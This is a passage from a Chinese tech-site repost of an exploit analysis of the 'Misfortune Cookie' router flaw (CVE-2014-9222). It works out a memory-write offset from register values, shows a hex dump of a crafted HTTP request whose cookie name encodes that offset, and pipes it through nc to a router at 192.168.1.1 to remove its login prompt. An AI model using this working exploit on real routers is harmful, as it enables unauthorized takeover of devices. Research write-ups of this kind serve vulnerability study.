您的位置:首页 > 菜鸟学院 > 技术分析:“厄运cookie”漏洞(CVE-2014-9222)解密

技术分析:“厄运cookie”漏洞(CVE-2014-9222)解密

来源:互联网 | 时间:2015-03-04 10:09:54 | 阅读:185 |    | 分享到:

好了, 正如我们想要实现的,EPC为 0×00000000。除此之外$s7的值为0x8040F8AC 也就是我们所寻找的$s4的值

现在,我们知道了$s4的值为0x8040F8AC,还有$t5的值为0x804163D4,即0x804163D4是对目的地址进行写操作的基址。因为我们需要覆盖0x8034FF94的值,所以:

0x8034FF94- 0x804163D4 = 0xFFF39BC0     # do thisin dword 0xFFF39BC0% 0x28 = 0                   # do this inqword 0xFFF39BC0/ 0x28 = 0x06661718           # do thisin qword 0x06661718= 107353880 (in decimal)

因为地址0x8034FF94正好是0×28字节对齐的chunk中的地一个字节,以至于我们只能通过null(0×00)覆盖一个字节。然而,如果我们通过curl给路由发送一个特别构造的数据包是有点不恰当,因为curl会用0x0d0a0d0a填充header。作为替代用nc来发送特别构造的数据包是一个更好的选择。将这个特别构造的数据包定义成一个文件再通过管道传到nc再发送至路由来远程“解锁”。让我们现在来试试

cawan$ cat./cawan_header | xxd 0000000:4745 5420 2f20 4854 5450 2f31 2e31 0a55 GET / HTTP/1.1.U 0000010:7365 722d 4167 656e 743a 2063 7572 6c2f ser-Agent: curl/ 0000020:372e 3333 2e30 0a48 6f73 743a 2031 3932 7.33.0.Host: 192 0000030:2e31 3638 2e31 2e31 0a41 6363 6570 743a .168.1.1.Accept: 0000040:202a 2f2a 0a43 6f6f 6b69 653a 2043 3130  */*.Cookie: C10 0000050:3733 3533 3838 303d 000a                7353880=..cawan$curl 192.168.1.1ProtectedObject

ProtectedObject

Usernameor Password errorcawan$ cawan$ catcawan_header | nc 192.168.1.1 80 cawan$cawan$curl 192.168.1.1                                           

好特网发布此文仅为传递信息,不代表好特网认同期限观点或证实其描述。

相关视频攻略

更多

扫二维码进入好特网手机版本!

扫二维码进入好特网微信公众号!

本站所有软件,都由网友上传,如有侵犯你的版权,请发邮件[email protected]

湘ICP备2022002427号-10 湘公网安备:43070202000427号© 2013~2024 haote.com 好特网